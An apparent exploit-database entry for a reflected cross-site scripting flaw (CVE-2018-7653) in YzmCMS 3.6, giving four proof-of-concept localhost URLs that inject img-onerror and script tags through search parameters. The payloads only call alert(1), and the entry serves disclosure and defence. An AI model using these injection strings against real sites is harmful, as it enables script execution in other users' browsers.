Lucene search
Zzw1337DAY-ID-30124HistoryApr 05, 2018 - 12:00 a.m.
YzmCMS 3.6 - Cross-Site Scripting Vulnerability
2018-04-0500:00:00
zzw
0day.today
14
0.008 Low
EPSS
Percentile
81.7%
Exploit for php platform in category web applications
# Exploit Title: YzmCMS 3.6 XSS Vulnerability
# Exploit Author: zzw ([emailΒ protected])
# Vendor Homepage: http://www.yzmcms.com/
# Software Link: http://www.yzmcms.com/
# Version: 3.6
# CVE : CVE-2018-7653
This is a XSS vulnerability than can attack the users.
poc:
http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes
# 0day.today [2018-04-14] #Related
cvelist
cvelist
CVE-2018-7653
2018-03-04 19:00:00
exploitpack
exploitpack
YzmCMS 3.6 - Cross-Site Scripting
2018-04-05 00:00:00
prion
prion
Design/Logic Flaw
2018-03-04 19:29:00
nuclei
nuclei
YzmCMS v3.6 - Cross-Site Scripting
2023-08-07 17:55:47
nvd
nvd
CVE-2018-7653
2018-03-04 19:29:00
packetstorm
packetstorm
YzmCMS 3.6 Cross Site Scripting
2018-04-05 00:00:00
cve
cve
CVE-2018-7653
2018-03-04 19:29:00
exploitdb
exploitdb
YzmCMS 3.6 - Cross-Site Scripting
2018-04-05 00:00:00